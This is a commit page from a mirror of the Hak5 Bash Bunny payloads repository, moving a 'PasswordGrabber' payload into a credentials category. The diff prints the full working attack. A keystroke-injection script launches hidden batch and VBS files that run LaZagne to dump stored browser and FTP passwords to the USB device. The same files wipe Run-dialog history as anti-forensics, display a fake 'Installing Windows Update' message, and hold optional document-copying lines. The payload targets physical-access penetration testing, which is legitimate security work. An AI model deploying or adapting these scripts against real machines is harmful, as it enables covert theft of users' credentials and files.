hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Moved PasswordGrabber into correct category

Browse Source
This commit is contained in:
Sebastian Kinne
2017-04-16 19:07:52 +10:00
parent 2903a16d89
commit b930b97baa
9 changed files with 17 additions and 114 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
payloads/library/PasswordGrabber/d.cmd
View File

@@ -1,4 +0,0 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit

38
payloads/library/PasswordGrabber/e.cmd
View File

@@ -1,38 +0,0 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

1
payloads/library/PasswordGrabber/i.vbs
View File

@@ -1 +0,0 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

19
payloads/library/PasswordGrabber/payload.txt
View File

@@ -1,19 +0,0 @@
#!/bin/bash
#
# Title: USB Exfiltrator
# Author: Hak5Darren
# Version: 1.1
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
#
LED ATTACK
ATTACKMODE HID STORAGE
DUCKY_LANG se
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
LED FINISH

32
payloads/library/PasswordGrabber/readme.md
View File

@@ -1,32 +0,0 @@
# PasswordGrabber
* Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ
* Version: Version 1.1
* Firmware support: 1.1
* Target: Windows
## Description
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
Full read here: https://github.com/AlessandroZ/LaZagne
## Configuration
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red | Attack Setup |
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/

5
payloads/library/credentials/PasswordGrabber/e.cmd
View File

@@ -7,10 +7,13 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
REM Creates directory compromised of computer name, date and time REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal setlocal
cd /d %~dp0 cd /d %~dp0
%~dp0\laZagne.exe all > %~dp0\..\..\loot\passwords.txt %~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul mkdir %dst% >>nul

BIN
payloads/library/credentials/PasswordGrabber/laZagne.exe
View File

Binary file not shown.

21
payloads/library/credentials/PasswordGrabber/payload.txt
View File

@@ -1,24 +1,19 @@
#!/bin/bash #!/bin/bash
# #
# Title: USB Exfiltration # Title: USB Exfiltrator
# Author: Hak5Darren # Author: Hak5Darren
# Version: 1.0 # Version: 1.1
# Target: Windows XP SP3+ # Target: Windows XP SP3+
# Props: Diggster, IMcPwn # Props: Diggster, IMcPwn
# Category: Exfiltration
# #
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs # which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny. # which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
# #
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION LED ATTACK
source bunny_helpers.sh
LED R
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
QUACK SET_LANGUAGE se DUCKY_LANG se
QUACK GUI r RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK DELAY 100 LED FINISH
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED G

11
payloads/library/credentials/PasswordGrabber/readme.md
View File

@@ -2,7 +2,8 @@
* Author: RazerBlade * Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ * Creds: Hak5Darren, AlessandroZ
* Version: Version 1.0 * Version: Version 1.1
* Firmware support: 1.1
* Target: Windows * Target: Windows
## Description ## Description
@@ -16,7 +17,8 @@ Full read here: https://github.com/AlessandroZ/LaZagne
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
If you are afraid of .exe you can compile your self from his github: https://github.com/AlessandroZ/LaZagne Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
## STATUS ## STATUS
@@ -26,8 +28,5 @@ If you are afraid of .exe you can compile your self from his github: https://git
| Green | Attack Complete | | Green | Attack Complete |
## Discussion ## Discussion
[Hak5 Forum Thread]("https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/") [Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
## Future Work
I will try to add mac support and also make the password file appear in the loot folder that [usb_exfiltrator] creates.